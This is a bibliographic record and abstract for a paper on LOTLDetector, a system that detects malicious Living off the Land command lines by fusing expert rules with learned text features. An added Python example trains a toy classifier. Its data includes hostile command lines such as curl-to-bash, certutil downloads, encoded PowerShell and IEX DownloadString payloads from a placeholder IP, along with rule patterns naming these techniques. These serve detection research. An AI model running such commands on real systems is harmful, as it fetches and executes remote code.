LOTLDetector: Living off the Land attacks detection system based on feature fusion

Bibliographic Details
Published in: Cybersecurity vol. 9, no. 1 (Dec 2026), p. 4
Main Author: Zhu, Tiantian
Other Authors: Zheng, Jie; Chen, Tieming; Lv, Mingqi; Xiong, Chunlin; Weng, Zhengqiu; Zheng, Xiangyang
Published: Springer Nature B.V.
Description
Abstract: In recent years, Living off the Land (LotL) attacks have been drawing attention due to their flexibility and difficulty in detection. These attacks exploit legitimate tools already in the system to conduct malicious activities, hiding their malicious intent behind normal benign programs. However, detection methods for such attacks largely rely on expert rules. While rule tags can effectively detect known attacks, this also leads to a high false positive rate, resulting in low detection accuracy for the models. To address these issues, we propose a detection system called LOTLDetector, which combines deep learning methods with expert rules to detect malicious command lines in LotL attacks from both data and knowledge perspectives. LOTLDetector learns the semantics of command line text through neural networks and combines rule tags from expert knowledge, enabling a more comprehensive detection of LotL attacks. We extensively evaluated our method, validated it on a Windows dataset containing 27,448 command lines and a Linux dataset containing 27,093 command lines, and compared it with existing methods. The results show that our method significantly outperforms existing methods in detecting malicious command lines. For the Linux dataset, the detection system achieved a detection performance with an accuracy of 0.9728; for the Windows dataset, the system's detection accuracy also reached 0.9598, which is about 8% higher than the best existing method. In addition, our project has been open-sourced at https://github.com/csedikaf/LOTLDetector.
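The abstract describes fusing two feature sources for each command line: binary expert rule tags (knowledge) and a learned representation of the command-line text (data). The following is an added illustration of that fusion idea, not the LOTLDetector code from the paper or its repository. It replaces the paper's neural text encoder with a hashed bag of tokens, uses a handful of hypothetical rule patterns, and trains a plain logistic regression on a small constructed set of labelled command lines. The rule patterns, the sample command lines, their labels and the IP 203.0.113.5 are all assumptions made for the example; the point it shows is that two benign lines which fire a rule tag (a rule-only false positive) are separated correctly once the text features are fused in.

```python
"""Toy feature-fusion command-line detector (added illustration, stdlib only).

This is NOT the LOTLDetector code from the paper. It only illustrates the
fusion idea the abstract describes: expert rule tags and data-driven text
features are concatenated into one vector and a classifier is trained on it.
The rule patterns, the sample command lines and their labels are constructed
for this example; the text features use a hashed bag of tokens as a cheap
stand-in for the paper's neural text encoder.
"""
import math
import re
import zlib

# (a) Expert rule tags: hypothetical LotL indicators, one binary feature each.
RULE_TAGS = {
    "encoded_powershell": re.compile(r"powershell.*\s-(?:e|enc|encodedcommand)\s", re.I),
    "certutil_download": re.compile(r"certutil.*-urlcache", re.I),
    "mshta_remote": re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
    "rundll32_javascript": re.compile(r"rundll32.*javascript:", re.I),
    "fetch_pipe_shell": re.compile(r"(?:curl|wget).*\|\s*(?:ba)?sh\b", re.I),
    "base64_decode": re.compile(r"base64\s+(?:-d|--decode)\b", re.I),
}
N_HASH = 128  # buckets of the hashed bag-of-tokens vector

def rule_features(cmd):
    """Knowledge half of the vector: one 0/1 entry per expert rule tag."""
    return [1.0 if pat.search(cmd) else 0.0 for pat in RULE_TAGS.values()]

def text_features(cmd):
    """Data half of the vector: hashed token presence (stand-in for an embedding)."""
    vec = [0.0] * N_HASH
    for tok in re.findall(r"[A-Za-z0-9_./\\:-]+", cmd.lower()):
        vec[zlib.crc32(tok.encode()) % N_HASH] = 1.0
    return vec

def fused_features(cmd):
    """Feature fusion by concatenation: rule tags followed by text features."""
    return rule_features(cmd) + text_features(cmd)

def _sigmoid(z):
    z = max(-30.0, min(30.0, z))  # clamp so exp() cannot overflow
    return 1.0 / (1.0 + math.exp(-z))

def train_logreg(X, y, epochs=500, lr=0.5):
    """Plain online-SGD logistic regression; enough for a handful of samples."""
    w, b = [0.0] * len(X[0]), 0.0
    for _ in range(epochs):
        for xi, yi in zip(X, y):
            g = _sigmoid(b + sum(wj * xj for wj, xj in zip(w, xi))) - yi
            w = [wj - lr * g * xj for wj, xj in zip(w, xi)]
            b -= lr * g
    return w, b

# Constructed training data: (command line, label), 1 = malicious, 0 = benign.
# The last two benign lines deliberately fire a rule tag (rule-only false
# positives); the text features are what lets the fused model separate them.
DATASET = [
    ("powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA", 1),
    ("certutil.exe -urlcache -split -f http://203.0.113.5/a.exe C:\\Users\\Public\\a.exe", 1),
    ("mshta.exe http://203.0.113.5/p.hta", 1),
    ("rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write()", 1),
    ("curl -s http://203.0.113.5/x.sh | bash", 1),
    ("echo aGVsbG8= | base64 -d | sh", 1),
    ("wget -qO- http://203.0.113.5/m | sh", 1),
    ("powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')", 1),
    ("powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1", 0),
    ("certutil.exe -hashfile C:\\installers\\setup.msi SHA256", 0),
    ("rundll32.exe shell32.dll,Control_RunDLL", 0),
    ("curl -o report.pdf https://intranet.example/report.pdf", 0),
    ("tar -xzf app.tar.gz -C /opt/app", 0),
    ("git pull origin main", 0),
    ("notepad.exe C:\\Users\\alice\\notes.txt", 0),
    ("base64 -d cert.b64 > cert.pem", 0),
    ("powershell.exe -NoProfile -EncodedCommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==", 0),
]

def train_detector(dataset=DATASET):
    X = [fused_features(cmd) for cmd, _ in dataset]
    y = [label for _, label in dataset]
    return train_logreg(X, y)

def predict_proba(model, cmd):
    w, b = model
    return _sigmoid(b + sum(wj * xj for wj, xj in zip(w, fused_features(cmd))))

def rule_only_alert(cmd):
    """Baseline detector: alert whenever any expert rule tag fires."""
    return any(rule_features(cmd))

def false_positives(dataset, alert):
    """Count benign lines on which the given alert function fires."""
    return sum(1 for cmd, label in dataset if label == 0 and alert(cmd))

MODEL = train_detector()

if __name__ == "__main__":
    for cmd, label in DATASET:
        print(f"{label} {predict_proba(MODEL, cmd):.3f} rule={rule_only_alert(cmd)} {cmd[:60]}")
    print("rule-only FPs:", false_positives(DATASET, rule_only_alert))
    print("fused FPs    :", false_positives(DATASET, lambda c: predict_proba(MODEL, c) > 0.5))
```

The scores printed are training-set scores on a toy set, so they say nothing about generalisation; the example only makes the mechanism concrete. In the real system the text half of the vector would come from the neural encoder and the evaluation would use held-out data as the paper does.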
ISSN:2523-3246
DOI:10.1186/s42400-025-00531-w
Source: Publicly Available Content Database